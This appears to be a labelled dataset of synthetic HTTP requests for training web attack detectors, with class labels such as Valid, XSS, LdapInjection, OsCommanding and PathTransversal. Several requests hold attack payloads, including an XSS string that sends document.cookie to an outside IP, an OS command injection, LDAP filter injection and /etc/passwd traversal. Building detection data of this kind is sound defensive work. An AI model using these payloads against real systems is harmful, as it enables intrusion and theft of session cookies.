Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: NTLM YmFhcmdhbWd2ZXNxMmU0bzdmbnhpYWliaWVUaW9vYWF0QmVhZXRHRTA=
Range: 998505-,-0540,815-
Referer: http://www.apseaw.com/aeqt/teeye0.sh
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.7 (X11; U; Open BSD i386 2.5; qo-il; rv:6.5.8) Gecko/92578244
UA-CPU: MIPS
UA-Disp: 900,140,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 512x1298
Via: 9.4 www.tadyh.html, 9.3 91.177.66.124, 3.2 187.152.126.45:9602
Transfer-Encoding: deflate
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36494
Start - Id: 2378
class: Valid
GET /aO-cop/ebrvsdWann4/s-qal3A6JGl02WXvhFK/gceVKbb8/y5M/aie2.bin?Xal3ieua8=vr01etsr&eniettl=heotTbrtn&dko7ru=script%3E&s5SOj=%3Cy%5Di+a%2Br&FG4bh=44He-UoA9&WtelnetLnunion1UXJ64s=%3A%282updateeoeves%24E%244shdeletec&suiuAb=iyI-&LVG4ZnvT2L=elF%40Vj8I9-p&imoebigldn2=9413048&c1irnctgsEFn2e=+&iyOsvu=iriolnIdaE4dns&ubooIpsn=0oaxrrnslba&Ralatn=086 HTTP/1.1
Host: www.aon8ie.be
Connection: keep-alive
Accept: application/rtf, application/zip;q=0.9, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: an-o, Fef-ese1Spe;q=0.3, auns-reeo28r;q=0.4, ci6mbine-Aod, nepceoau-8
Cache-Control: no-cache
Client-ip: 165.164.249.129
Cookie: hiaucbn8=pnCujhsnn4lnnl
Cookie2: $Version="665"
Date: Tue, 08 Sep 09 07:10:20 UTC
ETag: W/"HfLLigl2V_jPpDU0j"
Expect: 100-continue
From: ssmE@EDar2top.be
If-Modified-Since: Wed, 20 May 09 05:32:33 CET
If-Unmodified-Since: Mon, 05 Apr 10 09:00:34 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Feb 10 22:09:26 CET
Max-Forwards: 824
MIME-Version: 3.4
Pragma: eajuo=s
Proxy-Authorization: Digest response="32CC03ccCD2C4F02bb800C8DE1CCEbDB"
Authorization: Basic T29lbmxIOjhEdG1iOE4=
Range: 7-40040,63-,119158-
Referer: /sh2eryqx/ridlde.txt
TE: trailers,gzip;q=0.3,trailers
Trailer: Warning
User-Agent: y0hnleau (eK3Jz@eD78; rnE13N)
UA-CPU: PowerPC
UA-Disp: 311,7575,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3780x3384
Via: HTTP/8.3 www.qr1Nc1.tiff, 1.7 www.uscxxeih.shtml
Transfer-Encoding: deflate
Upgrade: luna/1.4, rEaav/2.7, aete/3.1, 2Cr5Ms/7.2, fsh/5.6
Warning: 147 www.uasbn7.js:57429 "tEetcorieaaNo4nDtsS" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 67775
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2378
Start - Id: 38887
class: LdapInjection
GET /wome/TwKPJchildhXWadmino7aO/uiIiowyendtuopb/rczci2eca1R0ieebsq.gif?hain=5092549&To7_-t3=%29+++%28+%7C++%28displayName%3Dhad*%29%28name+%3D+had*%29%28mail%3Dhad*++%29&nl22oooso=l1t&ggwlogSf=tdtstaihm&EconnectchildMY=f5loADgLm HTTP/1.0
Host: www.exeean2rom.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip, identity;q=0.8, compress, gzip
Accept-Language: reyr-fnmsn, tS8a-lptnry, fs-Ektae, bu-oeypn;q=0.1, oasYle1-etnhm7;q=0.6
Cache-Control: max-stale=656
Client-ip: 191.208.34.138
Cookie: ofsocnimoNt=C9s6i6script F6oxtoe
Cookie2: $Version="1"
Date: Sun, 01 Aug 04 02:03:08 UTC
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: onveaEc=boIat;tlR2=6o2r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 27 Dec 09 04:49:54 UTC
If-Unmodified-Since: Sat, 30 Oct 04 20:09:49 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 31 Dec 09 24:35:10 UTC
Max-Forwards: 5
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM MnQzaW9iYWF0aHNsUnRjYzBudGlpa0FvVWVjZWE3ZWlwNGVsaHNpYWZpc3BoZWE=
Authorization: NTLM dHRlODNtaDljd3V3ZzVycG5pc2xmaDNsaXJ5dWl5aW51dWdvaTJ4M25uYW95aGVl
Range: 15934-,799-8058,-81465
Referer: http://elaede.biz/brusgi/o2dhuhre.cgi
TE: gzip,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (compatible; Konqueror/7.6; Linux i386; ResrretTT; llis; muoyt)
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 5.4 www.afeah.tiff:05, FTP/8.6 www.enHl6cv.gif:90782
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: aHt/9.9, puadon/4.1, Ahs/8.1
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38887
Start - Id: 47272
class: XSS
GET /tIset0mhmtved7aeht/nn9gitiearn0tnameeat/eezdtjs/pT_GU/rukah6_N/t3ieoomvgzei1eip/xJnn8CZ7zSR0L.Wrox/USoireoi18/aeG54ATQVlIeRh3q.js?9oas=%3Cbgsound+++++src+++%3D+%22++javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F34.91.218.226%2Fic.jsp%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&awn=24&hsatEwzhen=At%3F%3C%7C5peuwp-t%24dz-c&S3chdet=56037638&sifntw=8083822280&echoufnodenodeVR_=aad5iphtpassr&oo8ys=Chsnht%40tijnstvi&6maEulmteo=ndocument3n%5Cn%3E5a0htpasswd%40sdivnreplace&amh=nie0%29pica%5Be%3D&rsGebrefe=s3j8Dua&bnesiamST=rfx8hU&eeitoUIw=bc14eta+e&imrgxmrna=103&eEsSuxa=18004 HTTP/1.1
Host: 73.43.8.155
Connection: keep-alive
Accept: video/mpeg, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.1, deflate;q=0.9, compress;q=0.1
Accept-Language: *;q=0.3
Cache-Control: BN=ro5hice
Client-ip: 10.37.184.28
Cookie: hjesnneac6=965106;is=7669071717;ihitD2zeaoyf7ea=uln?;sr=uShe2ttHNseso;5HfeoiEmdumpn1e=84
Cookie2: $Version="51"
Date: Sun, 14 Mar 04 10:47:19 UTC
ETag: W/"Ufd2bZimO@p87fbplQ"
Expect: eplnt
From: leiua@4Ndd7u.com
If-Modified-Since: Tue, 20 Oct 09 17:29:39 UTC
If-Unmodified-Since: Wed, 26 Nov 08 04:53:56 CET
If-Match: *
If-None-Match: "PGVZU8uEXPQt3ZpqF"
If-Range: ".Ne57r4fVAvxxuq"
Max-Forwards: 2336
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic T2V3bmthbjpMZ2kxZmE=
Range: 3-25949,-0524
Referer: /hoonhj/aefh.gif
TE: gzip,chunked;q=0.8
Trailer: Trailer
User-Agent: soeegnvyj/4.4.3.1.4
UA-CPU: x86
UA-Disp: 263,853,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 753x7661
Via: tosiy/1.9 203.136.254.13
Transfer-Encoding: gzip
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 851 www.in8ulg.gif "bqIlypddus4o" "Fri, 11 Sep 09 02:10:10 CET"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47272
Start - Id: 29046
class: Valid
GET /tesDr7ehdcLns/5daN/LEvshrtngbnnrk/BNkrwunnh/I9ao.nsf? HTTP/1.0
Host: 49.113.211.10:80
Connection: sumiht
Accept: application/*, image/*, audio/*;q=0.1
Accept-Charset: x-mac-roman;q=0.2, iso-8859-3;q=0.7, macintosh;q=0.9, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 12.54.89.63
Cookie: o@mU9=jv?%seTtsl $alocationa
Cookie2: $Version="403"
Date: Thu, 13 Aug 09 14:33:15 UTC
ETag: W/"8f.b@PKNWlrNy1@y3@"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Fri, 09 May 08 16:04:00 CET
If-Unmodified-Since: Sat, 07 Nov 09 14:18:45 GMT
If-Match: "LDo3.dH@igSULtQgM"
If-None-Match: "GDGhYXeCYpTLjIVY"
If-Range: Thu, 07 Apr 05 06:52:40 UTC
Max-Forwards: 85
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: gssa mdooRR=usOT
Authorization: Basic dllkbjppN3l0cg==
Range: 88-,-0,0575-
Referer: http://www.heoeL5T.ch/Bgug56a/deos2n/iCnnC/eir8C.swf
TE: trailers
Trailer: Max-Forwards
User-Agent: eot2faPlt (oH2veBNNl)
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 890x9958
Via: FTP/2.0 145.186.112.16:2
Transfer-Encoding: deflate
Upgrade: Ymaeea/2.1, onqsd/4.3
Warning: 861 14.0.150.19 "eaQ3e" "Mon, 03 May 04 08:13:54 CET"
X-Forwarded-For: 251.84.212.195
X-Serial-Number: 1881707
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29046
Start - Id: 37193
class: LdapInjection
GET /XzkacceptQGpseBHhtpassL8nc/1lbd1/sol/iOcgmmlzeTwwnesbezy/kmQydocumentwheredywindow.openjps/te/rhnenSit/so/echoechoj5I0fojraL/on.png?jr7zsreogileelt=%29++%28%7C++%28displayName%3Dhad*%29+%28name+++%3D++had*%29%28+mail%3Dhad*+%29&on=uel02e HTTP/1.1
Host: 254.94.66.122
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312;q=0.7, x-mac-japanese, windows-1251;q=0.3
Accept-Encoding: *
Accept-Language: 32hSs-lpg, 5-t1, nh3oxu3-ruakn;q=0.2, 1WrdrtV-cs9deeor;q=0.0
Cache-Control: max-age=087
Client-ip: 129.219.81.71
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="54"
Date: Sat, 17 Feb 07 20:23:55 GMT
ETag: "gWkihjapRYwi3oCzZ"
Expect: nn9nd9tM=omo4;rhen=ltly
From: ssnh@aamhzelr.net
If-Modified-Since: Sun, 29 Nov 09 20:31:08 GMT
If-Unmodified-Since: Fri, 14 Sep 07 11:03:00 CET
If-Match: "QHkl6BtaIA.9A8Naa9Y"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 91
MIME-Version: 2.5
Pragma: no-cache
Authorization: NTLM ZGxibnV5M2phb29QZWE0aGE5MkF2ZXRpMjNteWEyb3RtZ21l
Range: 605-286224
Referer: http://www.ous9o.de/hdoHrh/eqrqH0oy/iAjb/faaroir.wav
TE: trailers,chunked,chunked
Trailer: From
User-Agent: Mozilla/6.4 (X11; U; Linux i386 2.2; Td-he; rv:6.2.8) Gecko/31300327
UA-OS: Win98
Via: 2Irhs/1.2 92.36.242.48:85
Transfer-Encoding: 4ndit; rnatwo=rfRh5se
Upgrade: resPct/8.2
Warning: 049 www.snrd.js "elEedMobfonU" 
X-Forwarded-For: 200.50.212.253
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37193
Start - Id: 26864
class: Valid
GET /ciyrietitizrdoaiCnIe/ribqxJuulleMD.r7BZt/mI8ZtY/vYaM--xp_rYuTobetweenN/eSZC/QXfOvx9aCU/fe/tscehlwveoiA/rb6hU8HUmL46/iwcosASeedae7t/fin15echoBqfSCdocumentN/ahr.swf? HTTP/1.0
Host: 82.240.239.57
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eohdtTi-7ecgtd;q=0.2, rcs-o9stle
Cache-Control: no-cache
Client-ip: 46.49.11.226
Cookie: iuc=rE
Cookie2: $Version="2"
Date: Mon, 29 Mar 10 21:12:46 GMT
ETag: W/"2KkVB2IcwseNQAWSikXy"
Expect: nZv2tp
From: wmesh7n@tnizghsdil.be
If-Modified-Since: Fri, 30 Oct 09 17:14:43 CET
If-Unmodified-Since: Fri, 01 Feb 08 19:30:12 CET
If-Match: *
If-None-Match: *
If-Range: "1VxWOS8BUfpgcBRfsO"
Max-Forwards: 7
MIME-Version: 3.7
Pragma: eo='epr'
Proxy-Authorization: hjMn iHdsResa=dnoc2
Authorization: Digest realm
Range: -6214
Referer: http://otefsdt.com/seenrw8/egeosvs/8iuh/uaow.css
TE: gzip;q=0.3,trailers
Trailer: Pragma
User-Agent: sVf3I7Laxr http://www.hTel.fr
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9604x4951
Via: rhaie6/9.7 173.51.227.178
Transfer-Encoding: identity
Upgrade: leh/4.9, tsgto/9.5
Warning: 859 87.196.54.182 "s9ptiys" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26864
Start - Id: 32037
class: Valid
GET /KR2jR.zRR7A6/sHleejhtttEeb/4dieoNb/797wuj7l@M/ZEgysdKWpN.cgi? HTTP/1.1
Host: 185.141.172.117
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity, gzip, compress;q=0.6, identity, gzip;q=0.2
Accept-Language: *;q=0.3
Cache-Control: max-age=321
Client-ip: 212.189.3.187
Cookie: ion=linktA6;8Hcsost0=i5nMP;znYJK=execl
Cookie2: $Version="7"
Date: Thu, 12 Nov 09 18:11:40 UTC
ETag: "rMby0oEYpb43U340YH"
Expect: 100-continue
From: hMpeNchu@otttmeoI6.st
If-Modified-Since: Fri, 21 Dec 07 19:05:14 CET
If-Unmodified-Since: Wed, 02 Nov 05 05:34:14 UTC
If-Match: "awvr4PPjRQqPd_X"
If-None-Match: "K24rSh3B@-q1-CVF.zLI"
If-Range: Sun, 12 Jul 09 11:50:24 GMT
Max-Forwards: 187
MIME-Version: 3.7
Pragma: c0=hb3
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic YXRlSHliaGU6aXVuaEVvdHQ=
Range: 23518-
Referer: /NheNeue/1utpnq/ctpsle/5bere/intduta.asp
TE: chunked,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: 6labs/6.4
UA-CPU: x86
UA-Disp: 018,804,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8661x2250
Via: rt1i/7.5 63.13.60.4, est0s/7.4 80.187.155.7:8140
Transfer-Encoding: identity
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 581 www.alh9h.jpeg "sgdDg1ramgaonAnw" 
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32037
Start - Id: 23440
class: Valid
GET /a3liceul6annits/dwYi.jsp?s0=ct9nnpicsy&ctttA3cv=24777&umi=derhv1oC3 HTTP/1.1
Host: www.ns0sltosiu.cz:80
Connection: kloyr7a
Accept: audio/x-wav, audio/basic, application/zip;q=0.2
Accept-Charset: cp-950;q=0.7, shift_jis
Accept-Encoding: identity, deflate
Accept-Language: *
Cache-Control: max-stale=49516
Client-ip: 116.67.243.172
Cookie: s0anGde7hasor=uae4n4Xehui2eoh6il;e2AhtttIqodE=2680514;Fi=aa563fk;atotftoartdra7m=8orNtaleJbouItm;alasarrdvbnG=900454
Cookie2: $Version="4"
Date: Sat, 31 May 08 10:12:02 CET
ETag: "X0csyXE8WEvGg_zlTL"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Tue, 10 Mar 09 09:06:36 GMT
If-Unmodified-Since: Wed, 04 Oct 06 17:59:27 GMT
If-Match: "meaO3OIgNoyOdS.-L"
If-None-Match: "tdyOZ8sfLEjovP77yyf"
If-Range: Tue, 02 Jun 09 04:04:18 UTC
Max-Forwards: 2277
MIME-Version: 3.9
Pragma: eB='t'
Proxy-Authorization: Digest username="eru4bt"
Authorization: NTLM amJ0ZW90YW45c2VvOWdsZG9NZXRzbm84cDNhYXJvcmh4WXNpdDU=
Range: 47922-,-4850
Referer: /eb54i/siLe7il/iRueR101/5ehwnsa.asmx
TE: chunked
Trailer: Via
User-Agent: eeeukpi
UA-CPU: PowerPC
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/6.9 199.197.115.69, FTP/1.0 www.2eesd6i.css:745
Transfer-Encoding: gzip
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 271 www.yytteo.gif "tthisNt" 
X-Forwarded-For: 46.39.164.236
X-Serial-Number: 15233843
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23440
Start - Id: 9698
class: Valid
GET /eZMITWG..18Nk2xc/62CRgG-CykBx.9uA/aYM_Br0u2Aqo/NtE/aRnFirqijWqX.Ow1wO/dpIykwesr4t3/sQT.D@fDRMqV77/qhmterfe/F8WoWf_.sh?2le=0ran&adeletevDr5Xzr=6060&eeeian=114&t8mkIunbQha=J+&xbetweeninputz=albtuintclC8tvm&THGG1J=cgawvd9iq HTTP/1.1
Host: 182.134.42.255
Connection: keep-alive
Accept: audio/x-wav, text/*
Accept-Charset: iso-8859-8-i;q=0.6, euc-kr, windows-1250;q=0.3, x-mac-korean;q=0.6, hz-gb-2312
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 15.227.93.170
Cookie: Ynccrciwdc=30289;eto=a.7
Cookie2: $Version="8"
Date: Wed, 15 Feb 06 13:22:46 UTC
ETag: "6pz__4eCgpy@_zP2KI"
Expect: a6ne2bi=lomue
From: en20goGn@tsita.biz
If-Modified-Since: Mon, 07 May 07 02:01:36 GMT
If-Unmodified-Since: Sat, 30 Oct 04 17:49:15 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Aug 08 23:56:55 CET
Max-Forwards: 7
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM YXJ1cE93b01vaVRhYVNhNGI5bnBhY250SHdiZ3JsZ3BzdGdu
Authorization: Basic dzhlczpkb292c3Q=
Range: -75689,8442-
Referer: http://qd4wtt.biz/9treslor/ifgpk/raei9h/hydlrlee/h2dgs2.swf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.6 (Machintosh; U; PPC Mac OS X 4.6; sh-nE; rv:7.6.9) Gecko/93032038
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9609x7925
Via: FTP/9.7 www.o9f5.html, 7.8 238.253.44.29, 0.3 www.iaeoti.png
Transfer-Encoding: dratn
Upgrade: td7l/3.2, eIl/8.1, toa/8.7
Warning: 862 88.8.119.32:92250 "son3z6laioi" 
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9698
Start - Id: 43883
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.tiMah.uk:80
Connection: idna
Accept: text/html;q=0.1, audio/*, audio/x-wav;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 182.179.139.200
Cookie: UiaE0dN8TDm=7gihadmineotmpo
Cookie2: $Version="294"
Date: Fri, 20 Apr 07 21:52:18 CET
ETag: "4p2ZiLBnvJxcMOdpmaxa"
Expect: etc4ouNl=anmics2L
From: 2bgyahe@ty1w.biz
If-Modified-Since: Sat, 29 May 04 23:57:30 UTC
If-Unmodified-Since: Mon, 01 Sep 08 18:24:09 GMT
If-Match: "U4SgVWXsZnIx1_v5"
If-None-Match: "o80Br3oYw_Toit0ij@"
If-Range: "sEmGKjYhKUj0AqLv08J"
Max-Forwards: 063
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uiers/ieatYM/iCiR.tiff
Authorization: Basic dkVhczg6c2V0cG9laHA=
Range: 40517-,9-9675
Referer: /tdesi.zip
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: wameEsirfqltlja5ge
UA-CPU: Sparc
UA-Disp: 708,9864,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 629x1097
Via: 6.1 176.155.150.83, FTP/6.3 97.182.50.39
Transfer-Encoding: compress
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 115.236.50.254
X-Serial-Number: 245906346530085
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43883
Start - Id: 9406
class: Valid
GET /JshutdownQh@8kreplaceRb/_Cc/th9nDjagqNl1Dgxx/h0TdtLhlQC/YtelnetwuXautoexecX0GCvar.dll?iKdeleteZe=neae+&Trqey8g4=+egchild+%24%7Csam4by%7Cr%5Di&saeeMemlfudei=09367535&HNY1J0ik.Tz=04&enoeeiDdo=1630&vtuoytfitogMs=64105971&oihsos87oe=l4s&te=ah&cy2Cghmohr=iie&eeTyvee=eeenlsbe%3Dinphpnh HTTP/1.0
Host: 126.162.243.217
Connection: close
Accept: video/mpeg, text/html
Accept-Charset: iso-2022-jp;q=0.2, us-ascii, euc-tw, iso-8859-7, iso-8859-3;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=497
Client-ip: 92.24.119.207
Cookie: tEoai=rKr;fupdwtn61Nb=|C
Cookie2: $Version="39"
Date: Mon, 25 Apr 05 19:32:00 CET
ETag: "rL6DyzDqGZ.Tym0P"
Expect: 100-continue
From: yapns@3eeRle.cz
If-Modified-Since: Mon, 07 Feb 05 17:37:18 GMT
If-Unmodified-Since: Sun, 19 Sep 04 20:44:41 UTC
If-Match: "RA@zOEOJqPEQYbo-T"
If-None-Match: *
If-Range: Tue, 24 Apr 07 18:33:47 CET
Max-Forwards: 01
MIME-Version: 6.5
Pragma: S='tsauvo'
Proxy-Authorization: OdcSix ayHxs=easseTwo
Authorization: r2et ihti3tao=x2o5tn
Range: 15-64208,-25827,5343-67434
Referer: /tebu/eutro/mtd9dgue.asp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.7 (X11; U; Linux i586 6.4; ee-rv; rv:8.6.3) Gecko/26822395
UA-CPU: Sparc
UA-Disp: 849,768,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 064x637
Via: oqoi/4.1 www.qimd2oT.css
Transfer-Encoding: identity
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 337 83.238.5.69 "erpbowppr" "Thu, 29 Sep 05 23:26:00 CET"
X-Forwarded-For: 89.84.41.1
X-Serial-Number: 65848715378988
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9406
Start - Id: 6805
class: Valid
PUT /Wo1wRm0skIbYidt/r0mneq4uelwe/hyytReJudhrsEtmylahe/JGf_K/ieiSVsmp/tnotn4olnmsf/h5/Do/t7bTJj3buh/MvjbdIDGhL/su.php3? HTTP/1.1
Content-Length: 188
Content-Language: sngcaoui,a,dg
Content-Encoding: compress
Content-Location: /yanagokj/atheh/rdRsh/peae.jsp
Content-MD5: UGxndXJlbHRpZmNlbXNlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Sep 06 17:14:28 UTC
Last-Modified: Wed, 08 Nov 06 11:37:21 GMT
Host: www.erL5sNdiM.gov
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-greek, x-mac-arabic;q=0.9, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: gpj-ilba;q=0.1
Cache-Control: only-if-cached
Client-ip: 198.84.136.155
Cookie: oeOeofuhTeAii=a;_Tq.U@winntIbetween=8866
Cookie2: $Version="327"
Date: Wed, 06 Sep 06 15:35:45 CET
ETag: W/"HO-kbK.Uutl3mUwK.5"
Expect: 100-continue
From: cuaymSad@et4y.net
If-Modified-Since: Thu, 27 Jan 05 15:03:34 CET
If-Unmodified-Since: Wed, 01 Nov 06 17:09:42 UTC
If-Match: *
If-None-Match: "eaOKwBA06T5v@EM0H"
If-Range: *
Max-Forwards: 049
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic ZERhZjplaG5v
Authorization: gaio tvTeae=2eI7ri
Range: 75-484,-76,208013-709
Referer: http://ssehVRe.org/hufExT.php3
TE: deflate
Trailer: If-Match
User-Agent: dVjq-u http://www.ssmxOe.be
UA-CPU: StrongARM
UA-Disp: 293,6824,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5438x9106
Via: FTP/3.5 101.109.176.251, FTP/3.2 14.34.91.95
Transfer-Encoding: compress
Upgrade: dBgo/2.0, wlDi/5.8, HtDth/9.1, hep4/4.6, 0rhoi/3.5
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

3f0pmutrjtntMo4=2734&nmtH=wCFQx&muizts6zwmea=etAexXVt&idzs=eA3Sx&CBwRNjyor2updateo=30094283&ygnl=1072439&ie=64962065&sudhqg4ahewm8t=016&toe9NpxRI=t8stsM&theali=uhm3lmc1osa3hbpaa&tu=3155370

End - Id: 6805
Start - Id: 46359
class: PathTransversal
GET /9RaTCTESBW9CewZ/lb4EqJkXhC-8/r5V85N43EM7d.q32IkHp/xnq3ElaaIu0Vgeelftu/s6ihSercroyx9mbtkah7/rr97Z/smpN1XqWVo@e-/tTsgdE-jU/o-u-vrH/e6a/ir.htm?oIuw=9psod&eeztotSooMsi=%3BAdabint&txt=863173&lenk1o=149&pvXQDm=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&ile=4488&9nhoh=uteozoerwBtst&rtejt=uBwz&iohesstdeotet0=60464&oo=pialo&5ne7o4sasq=qVF9l6BWxS9&efHr4vsd81aosl=pe4wlsy&1hxM0qfG5V@w=tsetsginmue HTTP/1.1
Host: 0.164.252.156
Connection: lmdna1e
Accept: text/plain, video/*;q=0.5, application/*;q=0.9
Accept-Charset: euc-cn;q=0.0, hz-gb-2312, x-mac-greek;q=0.0, hz-gb-2312, x-mac-icelandic
Accept-Encoding: gzip;q=0.5
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 191.28.125.93
Cookie: clnhsdjcqons1rj=in1uD5;Z-6P=inandhuhvbm)meme;mrlsevs=[:~sPjins)Ptta
Cookie2: $Version="8"
Date: Wed, 15 Sep 04 05:27:42 CET
ETag: W/"7@bC0aVLxbOjP6v"
Expect: aitsn
From: cewts@1fgr.fr
If-Modified-Since: Thu, 25 Dec 08 09:58:03 UTC
If-Unmodified-Since: Wed, 17 Jun 09 13:47:46 UTC
If-Match: *
If-None-Match: "hNxmMUZYGc5pH6V"
If-Range: Sat, 16 Dec 06 21:55:11 CET
Max-Forwards: 10
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFyZWU4dDJjVWU1dW5pY3FoZXBhMW1mOXRsRXBocnJ6c2hhbXNzc2FpbHdo
Authorization: Digest uri=/Jt8oSe/oqit/ekti/teo8.js
Range: 405245-17797
Referer: /eredbmt/wecnu8a/1o9tlmr/AbduaoR/lsYe.ace
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: b.BYi_ http://www.m2hak.gov
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 648x2225
Via: 3.1 196.194.220.30
Transfer-Encoding: identity
Upgrade: tarad/0.1, sawaj/0.5, aeLes/2.3
Warning: 337 www.rrrgcit.jpeg "oqkre1aytdaE" 
X-Forwarded-For: 67.104.67.27
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46359
Start - Id: 22194
class: Valid
GET /dhsye/Jtceria/4AKNpxeval/hWUUW7FU.v/ogM/lwrE@@OqsD2kWN/CsuEc/tf4w4uFOjLj@BIvn7s9/E9r/I2.6cXQy2Mfrom.html?4E.rcpZ.scriptaBp_P=pan&QQkdP7=CFOxe&likerSG4eEK=hiARfyr6dp&Iwe9=etarletrhtmei&rnearentf8rgv=nsei&nklheby=tinput&hrmePf=bVmmhz4fNtee&UrdbCo9sh=r6cVtOpjbDci HTTP/1.0
Host: www.seaMsattI.net:80
Connection: close
Accept: video/quicktime
Accept-Charset: us-ascii;q=0.1, x-mac-ce, windows-1254;q=0.8, utf-8
Accept-Encoding: *
